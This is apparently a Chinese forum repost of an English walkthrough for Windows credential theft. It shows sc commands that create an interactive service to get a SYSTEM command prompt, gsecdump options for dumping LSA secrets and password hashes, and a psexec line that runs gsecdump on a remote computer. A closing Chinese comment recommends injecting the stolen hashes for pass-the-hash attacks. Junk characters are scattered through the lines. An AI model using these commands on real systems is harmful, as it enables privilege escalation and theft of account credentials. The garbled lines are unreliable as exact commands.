o get a DOS Prompt as NT system:
. d& W; R6 F, g% N' A$ A7 P2 r, w0 b: f$ x3 ?. U
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
: B* _1 n$ ]3 y+ A! z# g[SC] CreateService SUCCESS
5 s$ k' w+ c- c& K: G+ v. I& M# o
5 O4 K# i" l, `# r: ~- O- tC:\>sc start shellcmdline: ~* H* a) d+ L' M# }6 d8 X+ t* `
[SC] StartService FAILED 1053:" x3 l w7 z8 J& s) {5 k4 P5 Y$ Y
) x$ O e; P( A! e4 aThe service did not respond to the start or control request in a timely fashion." g7 E3 R$ }2 q! j
% y6 d0 ~0 }" L2 N) eC:\>sc delete shellcmdline
0 N* p3 Q* X1 @7 x- v- ~[SC] DeleteService SUCCESS
: \$ x, k+ h3 t# R$ W7 \4 F, X! }3 {1 K9 c
------------ }! M1 J8 r9 G. c; E( y
/ m0 |% z( c. L4 A/ e; U( K
Then in the new DOS window:' X3 f$ Q [1 m( B
8 X2 a, L" n& n
Microsoft Windows XP [Version 5.1.2600]: e+ y" t5 z% [
(C) Copyright 1985-2001 Microsoft Corp.
4 R- h# L( `9 Y' L5 a2 p+ s+ |. [8 l4 W- C0 |
C:\WINDOWS\system32>whoami' h' S! p; Q' q; W+ C( Z, y% e
NT AUTHORITY\SYSTEM
( o# S) y7 ~8 z0 Z6 G/ ~! N
$ i" S$ W! P! @ Q: mC:\WINDOWS\system32>gsecdump -h1 I6 M3 D- ^/ f7 L8 p5 s& g
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se); ^2 L( `2 N' N
usage: gsecdump [options]/ w* u% c/ C6 O, v
2 K! M- m" L- x/ koptions:
% K# \" {0 L- o$ r H-h [ --help ] show help
I9 J& W; \% `9 R1 g-a [ --dump_all ] dump all secrets$ P. k3 ~- ~6 v. @* q4 k5 [5 V
-l [ --dump_lsa ] dump lsa secrets& w; s1 U5 M8 q; j
-w [ --dump_wireless ] dump microsoft wireless connections7 Q% P3 k: Z0 I! E3 A- o" E+ O) S
-u [ --dump_usedhashes ] dump hashes from active logon sessions- u5 k( e5 a S( t
-s [ --dump_hashes ] dump hashes from SAM/AD4 g4 x8 D0 C8 d& Z
7 E* h' h/ I8 a2 j* A. {, c# `4 P4 i4 lAlthough I like to use:
) l6 j/ o9 t( p4 H7 g. W
/ T8 h$ P2 ^" ^& l) a3 V* v5 NPsExec v1.83 - Execute processes remotely
6 x) o3 l# R8 V+ L- ECopyright (C) 2001-2007 Mark Russinovich. K0 q$ @) f5 [! v: n# }: ]0 D7 R V
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
) ^8 U9 Y6 V7 R
0 V" ~; s# S* h! x( _9 rC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT! _0 P' z9 k% {
3 L9 k' I% s1 ^
to get the hashes from active logon sessions of a remote system.3 p3 I( i1 u& f
! w B: ~/ U$ Q" n `: GThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
, P6 t% T- C+ C1 N- Q" ~' }6 R$ w+ `# q3 c
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
1 k1 f0 M/ R/ A8 S原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]0 M/ F' u, B r. |4 T
' K1 V7 _) ~: D3 a6 Z
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。2 w4 j" ^! D' [& |
|
发表于 2012-11-6 21:09:29
收藏
支持
反对